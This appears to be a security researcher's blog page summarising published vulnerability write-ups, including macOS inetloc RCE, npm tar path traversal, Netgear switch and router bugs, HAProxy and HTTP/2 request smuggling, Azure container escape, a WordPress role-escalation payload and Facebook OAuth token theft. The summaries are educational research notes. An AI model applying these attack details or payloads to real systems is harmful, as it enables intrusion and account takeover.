Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

macOS Finder RCE- 623

Park Minchan - SSD     Reference →Posted 4 Years Ago
  • inetloc files are shortcuts for internet locations, such as RSS feeds. However, this can also include the file:// URI.
  • When using this with executables on MacOS, the file is simply ran! The POC is an extremely simple file that just runs the Calculator App on MacOS. It should be noted that the POC has a file URI with a large amount of slashes (/) in the XML file. However, only 3 are needed from my personal testing of the bug. I do not know why they would make such a confusing POC. When opening this as an email attachment even, arbitrary programs can be ran.
  • The fix from Apple tried restricting the file URI. However, the validation was case-insensitive! This meant that FIle:// could be used in order to bypass the check on newer versions.
  • This is a simple bug that is really easy to exploit. However, I think you would need a way to call a program with specific arguments in order to exploit this to allow for complete compromise. I wonder if the terminal can be called in this way?

5 RCEs in npm for $15,000- 622

Robert Chen    Reference →Posted 4 Years Ago
  • Package managers are a complicated ecosystem. We are installing code to run on our system. In the context of most package managers, we must choose to execute this code by calling functionality. This means that the package being installed should not be able to compromise the computer prior to being executed. With this in mind, we need to guarantee that this is the case!
  • The package node-tar promises that any extraction will NOT overwrite files outside the given directory. Since NPM install deals with tarballs, finding a bypass would be super interesting!
  • The first vulnerability is exactly this. The tarball extraction validates that an absolute path is not being used. But, this check looks weak, as only a single substring comparison; this comparison simply tried to strip off the beginning path if it had a '/'. Putting /// (three slashes) would change to // (two slashes), bypassing the filter. Now, we can write a file to any location upon installation!
  • To patch this vulnerability, some serious validation had to be done. The bulk of the patch used the isAbsolute function to check to see if the path was absolute or not. If we could find a way to get a difference between the resolve (executor) and isAbsolute (parser) we could bypass this check.
  • On Windows, C:/ can mark an absolute path. Using C:/different/root, the path.resolve function has a weird special case when the second parameter is an absolute path; it just resolves it! Additionally, the double dot (../) is only done between path deliminators. As a result, C:../ is a valid drive that we can use. This allowed for a minimal directory traversal (one directory up). Using a symlinked package, this could be used to do more damage though.
  • node-tar handles hardlinks and symbolic links (but not NPM). But, there is a guarantee that these will not overwrite files out of the current directory. However, there is a directory cache which executes these checks. If we could get a fake entry in the cache, we could use it to do the classic symlink and hardlink attack, resulting in arbitrary files being written to the system!
  • The first POC was fairly simple. Add a folder, tar this folder and remove the directory. At this point, the legit file system is different than cached system. By adding a symbolic link with the same name as our folder, extracting the archive, it will simply trust the file being written to on the symbolic link. Damn, that's real bad!
  • To patch the original bug, they just remove the entry from the directory cache. To bypass this, implementation specific Windows code could be used to cause havoc on Unix. The check for \\ should be checked on Windows but NOT Unix. Now, the same bug could bypass the filtering functionality because the FS was Unix and not Windows. The same exploit as before works except that the file name a\\x can be used instead in the cache.
  • The NEXT patch was even more defense-in-depth than before with complete path normalization (which seems great). However, MacOS does additional normalization of paths, violating the assumptions for the directory cache. Using unicode craziness on MacOs, it is possible to desync the cache and file system to use the same exploit as before.
  • These bugs were going to be endless... as a result, the project decided to drop the cache entirely if a symlink was discovered, killing the bug class. Good on them!
  • Overall, I enjoyed the content of the article but I found some of the explanations to be extremely clear; this forced me to put a lot of time into the article to figure out what the bug was. Once I understood the bugs, they were awesome though! Parsing & action is really hard to do as different systems have different expectations.

Mama Always Told Me Not to Trust Strangers without Certificates - 621

Adam - Grimm    Reference →Posted 4 Years Ago
  • Lots of Netgear routers include a software called Circle. This adds parental control features to these devices. Because this runs as root, it is still a good attack vector.
  • The Circle update daemon polls an HTTP service (note the lack of an 'S' there). This file contains firmware version information, database information and a few other things. If the component is out of date, it will reach out to grab a few files: database.tar.gz, firmware.bin and platforms.bin. The firmware and platform binaries are encrypted then signed blobs of data. However, the database files are not protected in this way. What can be done with this?
  • The update script unpacks the tar.gz file into a directory. In this same directory are the stopcircle, startcircle and several other scripts! Since we control files being extracted into this location, we can add files with these names to our tar.gz. With this, we can overwrite arbitrary scripts to get code execution.
  • To launch this exploit, we need to abuse the fact that the website is HTTP instead of HTTPS. This can be done via DNS spoofing or a classic MitM attack to change the database.tar.gz.
  • Overall, this is an interesting exploitation method. Although parts of the binary were signed, not all of them were. Using this one entry foothold, they used a mistake in the extraction process of the files to own the system. It turns out, that handling files is really hard.

Integer Overflow Enables HTTP Smuggling in HAProxy- 620

Ori Hollander & Or Peles - jfrog    Reference →Posted 4 Years Ago
  • HAProxy is a open source load balancer sever that is used for high traffic web sites. Considering it is used by many large companies, it is a good target to find a vulnerability in.
  • With HAProxy, the HTTP request needs to be processed and forwarded on to the next server in the chain. When processing requests, there are two main phases:
    • Initial parsing. The Content-Length is taken out to be used later. It should be noted that the request is translated into its own internal structure to parse.
    • The internal structure is processed, that was created in the initial parsing.
  • Within HAProxy, there is an integer overflow on header length. The size is only 8 bits and unsigned, this overflow can be triggered without crashing the application instantly. For instance, a header of size 270 would overflow to a size of 14. Why is this can issue?
  • In phase 1 of grabbing the Content-Length will be stored. This grabs all of the content for our payload. After the integer overflow occurs in stage 2, the location in the string to parse is now confused! Hence, we can change the expected Content-Length header of the request.
  • With the parsing confused, we can confuse the queue to continue parsing at the end of the request with our fake Content-Length header. What does this allow? HTTP Smuggling! This allows for an ACL bypass, WAF bypass and many other issues. This is an incredible impactful vulnerability.
  • I really appreciate when memory corruption vulnerabilities are not simply left as "pwn it now". This was not taken to code execution but turned a small overflow into an actual impactful attack.

Draconian Fear vulnerability - Netgear Switch- 619

gynvael    Reference →Posted 4 Years Ago
  • The authentication flow is convoluted but works. The flow is examples below:
    1. Obfuscated password is sent to the CGI API.
    2. The CGI creates a file for the auth request that is handled by another process.
    3. The handler of the authentication request authenticates the user. The session is created using the format /tmp/sess/guiAuth_{http}_{clientIP}_{userAgent}.
    4. The browser is polling for the request of the authentication attempt. During this polling step, the mentioned file above is accessed with some pre-filled in parameters.
  • The vulnerability lies in how much we can control the session file. The polling step relies on the IP and a numeric (1-5) browser user agent to verify the user to check. As a result, an attacker on the same IP as the admin can constantly poll this call while the login attempt it occurring to hijack the session. This window is only about 1 second though.
  • This bug would be extremely hard to exploit. However, the author claims that this attack could be achieved from the browser. Hence, it would be possible to constantly run this attack from a malicious website.
  • The author recommends that a cryptographically secure random value be used instead of the user agent and IP address for the file name. As a result, this attack would no longer be possible.
  • Overall, this is a good article (with another auth bypass here via a hardcoded password). I do not consider the IP address to be controllable. But, it is an input that I should consider, even if there is an IP validation check happening.

Seventh Inferno vulnerability - Netgear Switches- 618

gynvael    Reference →Posted 4 Years Ago
  • Switches are networking devices used all over the place. Being all to compromise a switch on a network would allow for traffic sniffing and many other serious attacks. This author chained several odd bugs into a badass pwn.
  • The Web UI logic uses a file to store all of the request information for an authentication request. This information is then used, from the file, in a different process to authenticate the user. This file contains a username, password, name of the result, name of the result file and some other information. An example of this file can be seen below:
    ---------------------------
    admin
    mySecretPassword
    /tmp/sess/guiAuth_http_::ffff:someip_5
    ::ffff:someip
    http
    5
    

    ---------------------------
  • The problem starts with the fact that both the username and password do not encode or escape any data. This makes newline injection possible to confuse the file parser. The only useful field we can inject into is a file name, which is the name of the result file. This gives a VERY small file write primitive where the file will either contain an ASCII 2 or 3, from the auth request.
  • The sessions are kept inside of the /var/tmp/sess/login_http_ file. From some crazy reason, a session file of simply 2 is completely valid! This is because of a complete lack of error checking on a multitude of things. Check for errors kids!
  • This is the craziest part though: the session file needs to end with the current session time. The creation time for these is NOT the Unix timestamp though; it is the time since last reset. But, we do not know this!? By crashing the switch, we can force 0 to be a valid number here. The author found that writing 2 to several files, such as /proc/sys/vm/panic_on_oom would immediately cause a crash. Additionally several TCP/IP in the outdated kernel would have worked as well.
  • Now, with the value 2 is the proper file, we have a valid session to call the application. Damn, that's an amazing find! To add insult to injury, there is command injection on an authenticated command as well, which makes compromise trivial at this point.

Cross-Account Container Takeover in Azure Container Instances- 617

Palo Alto Networks    Reference →Posted 4 Years Ago
  • Azure Container Instances (ACI) is a container as a service. ACI is ran on both Kubernetes and Service Fabric Clusters. All of the worker nodes are completely separated.
  • Doing recon for an container escape is really complicated because you need to get outside of the container first. By using a known design flaw with Linux containers (WhoC), they were able to see the container runtime. They found that the RunC version was extremely old and had many known vulnerabilities.
  • Even though they escaped the container, it was not possible to go to other worker nodes right away, as you plan for these types of issues to happen. They scouted around the other nodes to see any other issues. Since Kubernetes was also using a known vulnerability version (released in 2017-2018), they tried some of the existing issues.
  • One of these vulnerabilities (CVE-2018-1002102) appeared to be useful. The API server (master node) sometimes reaches out to the Kubelets. The vulnerability was that the API server allowed for redirects to another nodes Kubelet. As a result, we could communicate with other nodes (or so they thought). It ended up being patched and not being possible.
  • When making the requests to the middleware API server, they noticed an authorization header with an account token. Kubernetes uses JWTs when doing auth, but since anonymous access was enabled, this was surprising to them.
  • With access to the JWT, they were curious what permissions this gave them. After decoding the JWT, they noticed a permission that was very verbose: pods/exec. This permission allows for the execution of commands on any pod in the cluster In fact, this includes the API-server pod!
  • With code execution on the api-server, this was a complete game over. Because we control this, we can communicate with the other nodes in the cluster and compromise them cross-tenant. But, there is more!
  • Between the API-server and worker nodes, Microsoft added a bridge pod between them. While testing the communication to the bridge, they noticed an SSRF vulnerability. This was because whenever a command was to be executed on the pod, it grabbed the pods status.hostIP field, which is configurable by the attacker. The status.hostIP would only persistent for a few seconds but it can be constantly updated.
  • After playing around with this issue, they noticed that the IP did not just have to be an IP: it could be a full URL with the rest of the URL being added on with a fragment to make sure it did not effect the request at all. By setting the URL to be api-server, they could execute commands once again on this server.
  • The last bug must have taken an insane amount of time with blackbox reverse engineering. Both of these findings are quite awesome and awesome to see. I particularity enjoyed the race condition with URL issue though. URLs are extremely hard to handle; I personally think they are the best attack vector for finding vulnerabilities.

HTTP2: The Sequel is Always Worse DEFCON Talk- 616

James Kettle (Albinowax)     Reference →Posted 4 Years Ago
  • HTTP/2 is a completely different than HTTP/1.1. HTTP/1.1 is a plaintext protocol where headers are differentiated via newlines, while HTTP/2 is binary protocol. In HTTP/2, each frame has a built in length measurement while HTTP/1.1 has a length per request being sent. HTTP/2 has streams that allow for sending data over the same socket instead of multiple connections; this allows for data to be sent back out of order and it can still be found, since there is a stream id.
  • The first principle of this attack is HTTP/2 downgrades. Although the original connection may be over HTTP/2, the connection to the backend is being downgraded to HTTP/1.1 when being proxied to the backend. As a result, all of the security protections of HTTP/2 have vanished. By doing this, the backend may not agree with how the frontend thinks is a single request with the transfer-encoding or content-length header, just as HTTP/1.1 smuggling.
  • The rest of the presentation is mostly case studies on real world targets. On Netflix, the frontend would understand the Content-Length header in the HTTP/2 request and use this to forward the request to HTTP/1. The problem is that the Content-Length could be invalid, with other data attached to the request. This translation would result in a request being smuggled in that was not anticipated and an extra response being added.
  • Exploiting these bugs is complicated in practice since every situation is so unique. To exploit the bugs above, the author started redirecting users to his site, hoping to see sensitive information including authentication tokens. In on case, the victim server was checking to see if they were allowed to send the credentials to his server! At this point, they modified their own website to send the Access-Control headers to send them over.
  • The next example has to do when connection information is included in the request. In HTTP/2, any connection specific header needs to be labeled as malformed. In the case of AWS ALB and Incapsula WAF, this was not the case. Even though the header transfer-encoding: chunked should have been rejected, it was still appended onto the request. The Content-Length is written out but the backend server prioritizes the transfer-encoding: chunked header, resulting in another Desync.
  • In another attack against Firefox, they found a header injection vulnerability by putting the transfer-encoding header into another header but adding a newline inside the header. When this transfer between protocols occurred, there was another desync. Against Jira, this header injection worked to desync the response from the request, resulting in the wrong requests being sent back. There are a plethora of other ways to attack the HTTP/2 downgrade as well.
  • The exploitation path depends on the connection reuse. Depending on how much connection reuse is done, things such as internal header theft, header spoofing, cache poisoning, response queue poisoning and cross-user attacks may be possible. When there is no connection reuse, the attack does not work very well since we cannot affect the other users. How do we know that it is still vulnerable?
  • When sending two requests (when one is smuggled), this seems like a problem to detect. However, if we truly do smuggle a request, HTTP/1.1 headers will be returned in the response, even though the request should be HTTP/2 only. Sometimes, this is blind though and only the first response is sent back. Using a HEAD or OPTIONS request for this may result in headers being returned, such as the Content-Length, to make it obviously vulnerable. What can we do if we cannot attack other users though?
  • Once we have a request tunneling issue, we want to see or use the internal headers. Commonly, internal headers are used for sensitive operations, such as who the user is. By using tunneling, we can bypass rejection of the internal headers and use them anyway. Finding these can be hard, as it may require a bunch of brute forcing.
  • Another option for this attack is to leak internal headers. On BitBucket, the author noticed they could inject newlines into headers. As a result, the frontend and backend were confused on where the body of the request starts and ends. If the parameter that we are using gets reflected back in the request, the added internal headers will be appended to this! Now, we have leaked the headers. The headers may even have secret information in them as well.
  • If the stars truly align, web cache poisoning may be possible with request tunneling as well. Using the poisoning, we can create reflected XSS or hijack pages entirely.
  • The end of the article/talk gives a large list of other potential HTTP/2 smuggling issues:
    • Duplicating the path, method and scheme between different HTTP servers.
    • authority header replaces the HOST header. But, servers support both, which could cause issues.
    • The scheme of an HTTP/2 request that is meant to be HTTP/HTTPs. If this is not verified, we can put a full URL inside of it and confuse how servers are used. The author found SSRF using this exact issue.
    • Some servers do not allow newlines into the fields. However, they do allow for colons, which could cause issues.
    • Anything that is an input in HTTP/2 is potentially in danger. Especially those being converted to HTTP/1.1 can that are not in the HTTP/2 specification.
  • What else could there possible be? Essential knowledge! Lots of servers support HTTP/2 but forget to advertise it. Burp Request Smuggler now has a way to detect this. Additionally, some requests can corrupt each other; be careful when testing this, as you may corrupt your owns things.
  • The tooling is real interesting sparse right now but is going:
    • Turbo Intruder has custom H2 stack written by the author of this. Some rewrites were done to put things like newlines into places where they should not be at.
    • http2smugl is a patched GoLang client.
    • Burp Suite has a repeater and the normal proxy, which can be used for this.
    • YouTube talk and similar research.

Easily Exploitable Critical Vulnerability in ProfilePress Plugin of WordPress- 615

Numan Rajkotiya - SecureLayer    Reference →Posted 4 Years Ago
  • ProfilePress, better known (and more clear) as User Avatar, is installed on 400K sites. During the registration process, users could supply metadata about themselves that was directly added to the user information.
  • This seems fine and dandy for fun customization. However, it has a deadly issue: the metadata was not validated for security threats. By setting metadata about the wp_capabilities of a user, it was possible to set the users role on the website, such as admin.
  • To make matters worse, this endpoint does not even validate if registration is enabled on the site. Hence, this can be exploited even if the feature is not turned on. Damn!
  • The endpoint takes in an array of user input. By passing in wp_capabilities[administrator]=1 in the request, we have poisoned the metadata of the user registration. Complete game over!
  • This bug requires a good understanding of how Wordpress works. I personally may not have found this right away simply because I would not have thought about the metadata being this important for the user creation.

More secure Facebook Canvas: Tale of $126k worth of bugs that lead to Facebook Account Takeovers- 614

Youssef Sammouda    Reference →Posted 4 Years Ago
  • Facebook allows for online game owners to host games in apps.facebook.com within an iFrame. Since this is an iFrame, cross window communications via postMessage must be done, which is hard to do securely!
  • To find these bugs, the author thoroughly audited the the client-side code and seeing the inputs/outputs throughout. The author shows the minimized code that they remained in order to be better to review.
  • The flow of this is a little complicated. The flow works like this:
    1. iFrame sends message to the parent.
    2. Message event dispatcher in XdArbier passes the data to handleMessage function.
    3. This is passed to JSONPRC call, which pops a dialog box to show the user about the author of the app.
    4. If all checks out, PlatformDialogClient is called to make a POST request to apps.facebook.com/dialog/oauth.
    5. This endpoint returns an access token, which is sent back to the iFrame containing the access token.
  • The author mentions a few potential items of interest:
    • IFRAME_ORIGIN is used in the redirect_uri parameter of OAuth. Making this go to the wrong location could allow for a classic OAuth attack that steals the access token.
    • Keys and values within the params object. Some of these parameters are attached to the OAuth POST request mentioned above, such as the APP_ID and the IFRAME_ORIGIN.
    • What if we could convince IFRAME_ORIGIN and the APP_ID that we were a different app, such as Instagram? Of course, there is protection in place!
  • The first vulnerability is parameter pollution with a desync between from the frontend verification and backend understanding. When making the call to PARAM[random it would replace the actual parameter with this value, even though the client side did not do this! As a result, we have a desync between the understanding of the redirect_uri for the frontend and backend.
  • Using the desync mentioned above, we can set the redirect_uri to be the Instagram login page and have the app ID be Instagram's as well. Now, the OAuth endpoint will return a first party token from Instagram. Parameter pollution is crazy when it works!
  • The second vulnerability is deep into the flow of the application and hits many edge cases. When validating the origin information, there is a special case for when there is no fragment being sent in the URL. When this happens, a variable named k is used instead. What is k though? Although it is not clear what it is used for, the validation of it being set is flawed, since it trusts the APP_ID that we send with it.
  • By setting k ourselves with the flawed APP_ID check, we can again get a first party token from many apps. Although, this did not work with all applications.
  • The version property in params passed in the original cross window message did not check for directory traversal or added paths. This bug occurs when adding the API version into the URL, which is user controllable. As a result, we can trick the URL in order to make queries to GraphQL on behalf of us by making the version number some point and uses a fragment to remove other parts of it. The author chooses to add a phone number to the users account, which could be used for a complete account takeover.
  • Cross origin communication with complicated authentication schemes is extremely difficult to do. It took this researcher a while to understand the whole flow of this. Once they did, it became a bug farm with fairly niche and crazy attacks. Really good article from Youssef.